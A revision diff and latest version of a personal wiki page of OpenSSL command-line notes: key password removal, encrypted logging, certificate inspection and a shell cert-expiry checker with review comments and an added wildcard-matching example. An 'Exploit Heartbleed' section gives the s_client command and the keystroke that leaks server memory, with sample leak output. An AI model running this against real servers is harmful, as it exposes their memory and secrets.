Difference between revisions of "OpenSSL notes"

From Noah.org
 
(5 intermediate revisions by the same user not shown)
Line 26: Line 26:
 
<pre>
 
<pre>
 
cat log.bf | openssl bf -d -salt
 
cat log.bf | openssl bf -d -salt
 +
</pre>
 +
 +
== get certificate details from a remote SSL host ==
 +
 +
This will download the SSL cert currently in use on a remote host. This uses openssl in client mode to retrieve and decode the certificate on the remote server.
 +
<pre>
 +
openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout
 +
</pre>
 +
 +
Some of the more interesting fields can be parsed into variables.
 +
<pre>
 +
NOW=$(date "+%s")
 +
CERT_INFO=$(openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout)
 +
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
 +
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
 +
CERT_EXPIRATION_DAYS=$((($CERT_EXPIRATION_SECONDS - ${NOW}) / 60 / 60 / 24))
 +
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*: \(.*\)/\1/p')
 +
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*:.*CN=\(.*\)/\1/p')
 +
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*: \(.*\)/\1/p')
 +
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*:.*CN=\(.*\)/\1/p')
 +
</pre>
 +
 +
=== simple SSL cert checker ===
 +
 +
Throw this all together to make a simple SSL certificate checker.
 +
<pre>
 +
#!/bin/sh
 +
# FIXME: This does not handle star certs (*.example.com).
 +
# if echo "${CERT_SUBJECT_CN}" | grep -q -v "*"; then
 +
 +
SSL_HOSTNAME=$1
 +
 +
NOW=$(date "+%s")
 +
CERT_INFO=$(openssl s_client -connect ${SSL_HOSTNAME}:443 </dev/null 2>/dev/null | openssl x509 -text -noout)
 +
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
 +
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
 +
CERT_EXPIRATION_DAYS=$(( ( $CERT_EXPIRATION_SECONDS - ${NOW} ) / 60 / 60 / 24))
 +
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*: \(.*\)/\1/p')
 +
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*:.*CN=\(.*\)/\1/p')
 +
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*: \(.*\)/\1/p')
 +
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*:.*CN=\(.*\)/\1/p')
 +
 +
if [ "${CERT_SUBJECT_CN}" != "${SSL_HOSTNAME}" ]; then
 +
        echo "ERROR: SSL hostname does not match Subject CN in the cert." >&2
 +
        echo "SSL_HOSTNAME: ${SSL_HOSTNAME}" >&2
 +
        echo "CERT_SUBJECT_CN: ${CERT_SUBJECT_CN}" >&2
 +
        exit 1
 +
fi
 +
 +
if [ ${CERT_EXPIRATION_DAYS} -lt 0 ]; then
 +
        echo "ERROR: Certificate has expired." >&2
 +
        echo "CERT_EXPIRATION_DATE: ${CERT_EXPIRATION_DATE}" >&2
 +
        exit 1
 +
fi
 +
</pre>
 +
 +
== Exploit Heartbleed ==
 +
 +
Run this command with '''example.com''' replaced with your target.
 +
<pre>
 +
openssl s_client -connect example.com:443 -tlsextdebug -debug -state
 +
</pre>
 +
You will see a bunch of config info and some binary hex dumps with will be terminated with three dashes alone on the last line, '''---'''. The three dashes are your prompt.
 +
<pre>
 +
    0090 - 70 5b be 25 54 06 27 5f-11 10 7f 73 32 37 24 1b  p[.%T.'_...s27$.
 +
    00a0 - 77 6c 7d fa e6 1d bc 59-e3 80 fd 27 d1 bb bc da  wl}....Y...'....
 +
    00b0 - 2f 3d 85 7d e3 81 3c 67-e5 c5 da ce 59 ea 10 a8  /=.}..<g....Y...
 +
 +
    Start Time: 1397375884
 +
    Timeout  : 300 (sec)
 +
    Verify return code: 18 (self signed certificate)
 +
---
 +
</pre>
 +
At this point simply type a capital '''B''' and press Enter. You should receive back one of three respones.
 +
 +
A machine that does not support '''HEARTBEAT''' is not vulnerable and will terminate the connection with a message sort of like this.
 +
<pre>
 +
---
 +
B
 +
HEARTBEATING
 +
140048930530984:error:1413B16D:SSL routines:SSL_F_TLS1_HEARTBEAT:peer does not accept heartbearts:t1_lib.c:2566:
 +
write to 0x9d0e20 [0x9da953] (27 bytes => 27 (0x1B))
 +
0000 - 15 03 01 00 16 eb 69 1b-3d 72 d9 5d fd 57 4d 1a  ......i.=r.].WM.
 +
0010 - 45 86 c6 41 13 e9 0c 1c-07 ee 9e                  E..A.......
 +
SSL3 alert write:warning:close notif
 +
</pre>
 +
A machine that supports '''HEARTBEAT''' but is '''not''' vulnerable will print a short binary hex dump followed by the '''---''' prompt. You may type '''B''' again and press Enter. But there should be nothing interesting to do now so type '''CTRL-C''' to exit.
 +
<pre>
 +
---
 +
B
 +
HEARTBEATING
 +
write to 0x230a500 [0x2314543] (66 bytes => 66 (0x42))
 +
0000 - 18 03 03 00 3d ae c1 35-6d b9 f2 92 b8 cf 5c c8  ....=..5m.....\.
 +
0010 - 6e 10 14 d1 c0 62 1c 04-30 30 e5 84 ef c1 18 b3  n....b..00......
 +
0020 - 35 71 67 70 c2 58 67 4d-4c 02 4c 32 0c cb 80 9a  5qgp.XgML.L2....
 +
0030 - 1c fc 82 de fb f6 a3 f4-a6 77 f2 21 46 00 6f 19  .........w.!F.o.
 +
0040 - ae 65                                            .e
 +
read from 0x230a500 [0x230fff3] (5 bytes => 5 (0x5))
 +
0000 - 18 03 03 00 3d                                    ....=
 +
read from 0x230a500 [0x230fff8] (61 bytes => 61 (0x3D))
 +
0000 - 8a 96 0e 19 3e dd 76 2a-fd 4f eb 7f e0 f1 f2 66  ....>.v*.O.....f
 +
0010 - f5 b2 98 52 96 a6 de 53-de 6d ca 64 68 cb 3c 22  ...R...S.m.dh.<"
 +
0020 - d9 62 fd 7c 2a 45 2c a4-fd 49 4e bd 2f 96 18 0d  .b.|*E,..IN./...
 +
0030 - 81 fb a5 ee e0 73 a1 a1-43 b5 a0 ce cc            .....s..C....
 +
read R BLOCK
 +
</pre>
 +
A machine that is vulnerable will print a very long binary hex dump followed by the '''---''' prompt. You may type '''B''' again and press Enter. Keep doing that. When you get bored type '''CTRL-C''' to exit.
 +
<pre>
 +
---
 +
B
 +
HEARTBEATING
 +
write to 0x801818160 [0x8019d5803] (58 bytes => 58 (0x3A))
 +
0000 - 18 03 03 00 35 dd 8d 53-31 40 33 fb d4 f9 cb 0e  ....5..S1@3.....
 +
0010 - d6 a2 8c bd 9c 33 dd 26-99 32 fa 96 ed 3d 25 84  .....3.&.2...=%.
 +
0020 - 16 f5 06 e3 38 1f bc eb-1b d7 f4 dc 23 3e e2 f7  ....8.......#>..
 +
  ... removed for brevity ...
 +
0570 - f5 8d ed a6 3a a8 d5 9f-d5 72 c0 dc 21 69 6d 02  ....:....r..!im.
 +
0580 - ca 95 60 c4 1e a0 4e 7d-46 5d 97 62 77 e1 f5 8e  ..`...N}F].bw...
 +
0590 - 4c f6 ec c4 47 50 04 5f-b9 8e 00 8c 58 a7 c9 8d  L...GP._....X...
 +
  ... removed for brevity ...
 
</pre>
 
</pre>
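Review bot: In the "simple SSL cert checker" script, the test `[ "${CERT_SUBJECT_CN}" != "${SSL_HOSTNAME}" ]` is an exact string comparison against the Subject CN only, so wildcard certificates (as the FIXME admits) and names carried only in subjectAltName are reported as mismatches; match against the SAN DNS entries and treat a leftmost `*` label as covering one label. In the same script CERT_INFO is never checked for being empty, so a failed connection leaves CERT_EXPIRATION_DAYS unset and the unquoted `[ ${CERT_EXPIRATION_DAYS} -lt 0 ]` fails with a syntax error instead of a clear message. `${SSL_HOSTNAME}` should be quoted in the s_client call, and passing `-servername` would make name-based virtual hosts return the right certificate. In the Heartbleed text, "with will be terminated" should read "which will be terminated" and "respones" should read "responses".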

Latest revision as of 01:22, 13 April 2014


External OpenSSL Command-line FAQ

This OpenSSL HowTo/FAQ deals with the command-line openssl.

Remove password from OpenVPN key

The user's client.key generated by `openvpn --genkey` is an OpenSSL RSA key. You can use `openssl` commands on the key. This will overwrite the existing client.key file:

openssl rsa -in client.key -out client.key

Encrypt output of a command to log file

It is pretty trivial to send output from a command to an encrypted log file. This is useful if running a server in debug mode where log output might contain sensitive information such as personal information or passwords.

some_command | openssl bf -e -salt -out log.bf

You can decrypt the log file while the command is still running.

cat log.bf | openssl bf -d -salt

get certificate details from a remote SSL host

This will download the SSL cert currently in use on a remote host. This uses openssl in client mode to retrieve and decode the certificate on the remote server.

openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout

Some of the more interesting fields can be parsed into variables.

# Note: "date --date" requires GNU date.
NOW=$(date "+%s")
CERT_INFO=$(openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout)
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
CERT_EXPIRATION_DAYS=$(( (CERT_EXPIRATION_SECONDS - NOW) / 60 / 60 / 24 ))
# Match "Issuer:" and "Subject:" exactly so that extension lines such as
# "X509v3 Subject Alternative Name:" are not picked up. "CN *= *" accepts both
# the older "CN=name" and the newer "CN = name" output formats.
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer: \(.*\)/\1/p')
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer:.*CN *= *\(.*\)/\1/p')
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject: \(.*\)/\1/p')
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject:.*CN *= *\(.*\)/\1/p')

simple SSL cert checker

Throw this all together to make a simple SSL certificate checker.

#!/bin/sh
# FIXME: This does not handle star certs (*.example.com).
# if echo "${CERT_SUBJECT_CN}" | grep -q -v "*"; then
# Note: "date --date" requires GNU date.

SSL_HOSTNAME=$1
if [ -z "${SSL_HOSTNAME}" ]; then
        echo "usage: $0 hostname" >&2
        exit 2
fi

NOW=$(date "+%s")
# -servername sends SNI so a name-based virtual host returns its own cert.
CERT_INFO=$(openssl s_client -connect "${SSL_HOSTNAME}:443" -servername "${SSL_HOSTNAME}" </dev/null 2>/dev/null | openssl x509 -text -noout)
if [ -z "${CERT_INFO}" ]; then
        echo "ERROR: Could not retrieve a certificate from ${SSL_HOSTNAME}." >&2
        exit 1
fi
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
CERT_EXPIRATION_DAYS=$(( (CERT_EXPIRATION_SECONDS - NOW) / 60 / 60 / 24 ))
# "CN *= *" accepts both the "CN=name" and "CN = name" output formats.
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer: \(.*\)/\1/p')
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer:.*CN *= *\(.*\)/\1/p')
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject: \(.*\)/\1/p')
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject:.*CN *= *\(.*\)/\1/p')

if [ "${CERT_SUBJECT_CN}" != "${SSL_HOSTNAME}" ]; then
        echo "ERROR: SSL hostname does not match Subject CN in the cert." >&2
        echo "SSL_HOSTNAME: ${SSL_HOSTNAME}" >&2
        echo "CERT_SUBJECT_CN: ${CERT_SUBJECT_CN}" >&2
        exit 1
fi

if [ "${CERT_EXPIRATION_DAYS}" -lt 0 ]; then
        echo "ERROR: Certificate has expired." >&2
        echo "CERT_EXPIRATION_DATE: ${CERT_EXPIRATION_DATE}" >&2
        exit 1
fi
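
The FIXME above notes that the checker does not handle star certs. The following is an added example, not part of the original page, of a wildcard-aware name check that also reads the subjectAltName DNS entries. The function names and the sample certificate text are constructed for illustration, and refusing patterns such as `*.com` is a conservative choice made here.

```shell
#!/bin/sh
# Added example: wildcard-aware hostname check for the cert checker.
# Function names and the sample certificate text are constructed.

# cert_name_matches PATTERN HOSTNAME -> exit status 0 when HOSTNAME is covered.
# "*" is honoured only as the whole leftmost label and stands for one label.
cert_name_matches() {
    pattern=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    host=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    [ -n "$pattern" ] && [ -n "$host" ] || return 1
    case "$pattern" in
        \*.*)
            suffix=${pattern#\*}                        # e.g. ".example.com"
            case "$suffix" in *\**) return 1 ;; esac    # a second "*" is invalid
            case "${suffix#.}" in *.*) ;; *) return 1 ;; esac  # refuse "*.com"
            case "$host" in *"$suffix") ;; *) return 1 ;; esac
            first=${host%"$suffix"}
            [ -n "$first" ] || return 1                 # "*" needs a label
            case "$first" in *.*) return 1 ;; esac      # but only one label
            return 0 ;;
        *\**) return 1 ;;                               # "*" elsewhere: reject
        *) [ "$pattern" = "$host" ] ;;
    esac
}

# cert_covers_host HOSTNAME  (reads "openssl x509 -text -noout" output on stdin)
# Checks subjectAltName DNS entries; falls back to the Subject CN only when
# the certificate has no DNS entries at all.
cert_covers_host() {
    text=$(cat)
    names=$(printf '%s\n' "$text" | tr ',' '\n' | sed -n 's/^ *DNS:\(.*\)$/\1/p')
    if [ -z "$names" ]; then
        names=$(printf '%s\n' "$text" | sed -n 's/.*Subject:.*CN *= *\([^,/]*\).*/\1/p')
    fi
    while IFS= read -r name; do
        cert_name_matches "$name" "$1" && return 0
    done <<EOF
$names
EOF
    return 1
}

# Constructed sample of the relevant "openssl x509 -text" lines.
SAMPLE_CERT_TEXT='        Subject: C = US, O = Example Org, CN = example.com
            X509v3 Subject Alternative Name: 
                DNS:example.com, DNS:*.example.com'
```

In the checker, `echo "${CERT_INFO}" | cert_covers_host "${SSL_HOSTNAME}"` can take the place of the exact Subject CN comparison.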

Exploit Heartbleed

Run this command with example.com replaced with your target.

openssl s_client -connect example.com:443 -tlsextdebug -debug -state

You will see a bunch of config info and some binary hex dumps which will be terminated with three dashes alone on the last line, ---. The three dashes are your prompt.

    0090 - 70 5b be 25 54 06 27 5f-11 10 7f 73 32 37 24 1b   p[.%T.'_...s27$.
    00a0 - 77 6c 7d fa e6 1d bc 59-e3 80 fd 27 d1 bb bc da   wl}....Y...'....
    00b0 - 2f 3d 85 7d e3 81 3c 67-e5 c5 da ce 59 ea 10 a8   /=.}..<g....Y...

    Start Time: 1397375884
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---

At this point simply type a capital B and press Enter. You should receive back one of three responses.

A machine that does not support HEARTBEAT is not vulnerable and will terminate the connection with a message sort of like this.

---
B
HEARTBEATING
140048930530984:error:1413B16D:SSL routines:SSL_F_TLS1_HEARTBEAT:peer does not accept heartbearts:t1_lib.c:2566:
write to 0x9d0e20 [0x9da953] (27 bytes => 27 (0x1B))
0000 - 15 03 01 00 16 eb 69 1b-3d 72 d9 5d fd 57 4d 1a   ......i.=r.].WM.
0010 - 45 86 c6 41 13 e9 0c 1c-07 ee 9e                  E..A.......
SSL3 alert write:warning:close notif

A machine that supports HEARTBEAT but is not vulnerable will print a short binary hex dump followed by the --- prompt. You may type B again and press Enter. But there should be nothing interesting to do now so type CTRL-C to exit.

---
B
HEARTBEATING
write to 0x230a500 [0x2314543] (66 bytes => 66 (0x42))
0000 - 18 03 03 00 3d ae c1 35-6d b9 f2 92 b8 cf 5c c8   ....=..5m.....\.
0010 - 6e 10 14 d1 c0 62 1c 04-30 30 e5 84 ef c1 18 b3   n....b..00......
0020 - 35 71 67 70 c2 58 67 4d-4c 02 4c 32 0c cb 80 9a   5qgp.XgML.L2....
0030 - 1c fc 82 de fb f6 a3 f4-a6 77 f2 21 46 00 6f 19   .........w.!F.o.
0040 - ae 65                                             .e
read from 0x230a500 [0x230fff3] (5 bytes => 5 (0x5))
0000 - 18 03 03 00 3d                                    ....=
read from 0x230a500 [0x230fff8] (61 bytes => 61 (0x3D))
0000 - 8a 96 0e 19 3e dd 76 2a-fd 4f eb 7f e0 f1 f2 66   ....>.v*.O.....f
0010 - f5 b2 98 52 96 a6 de 53-de 6d ca 64 68 cb 3c 22   ...R...S.m.dh.<"
0020 - d9 62 fd 7c 2a 45 2c a4-fd 49 4e bd 2f 96 18 0d   .b.|*E,..IN./...
0030 - 81 fb a5 ee e0 73 a1 a1-43 b5 a0 ce cc            .....s..C....
read R BLOCK

A machine that is vulnerable will print a very long binary hex dump followed by the --- prompt. You may type B again and press Enter. Keep doing that. When you get bored type CTRL-C to exit.

---
B
HEARTBEATING
write to 0x801818160 [0x8019d5803] (58 bytes => 58 (0x3A))
0000 - 18 03 03 00 35 dd 8d 53-31 40 33 fb d4 f9 cb 0e   ....5..S1@3.....
0010 - d6 a2 8c bd 9c 33 dd 26-99 32 fa 96 ed 3d 25 84   .....3.&.2...=%.
0020 - 16 f5 06 e3 38 1f bc eb-1b d7 f4 dc 23 3e e2 f7   ....8.......#>..
   ... removed for brevity ...
0570 - f5 8d ed a6 3a a8 d5 9f-d5 72 c0 dc 21 69 6d 02   ....:....r..!im.
0580 - ca 95 60 c4 1e a0 4e 7d-46 5d 97 62 77 e1 f5 8e   ..`...N}F].bw...
0590 - 4c f6 ec c4 47 50 04 5f-b9 8e 00 8c 58 a7 c9 8d   L...GP._....X...
   ... removed for brevity ...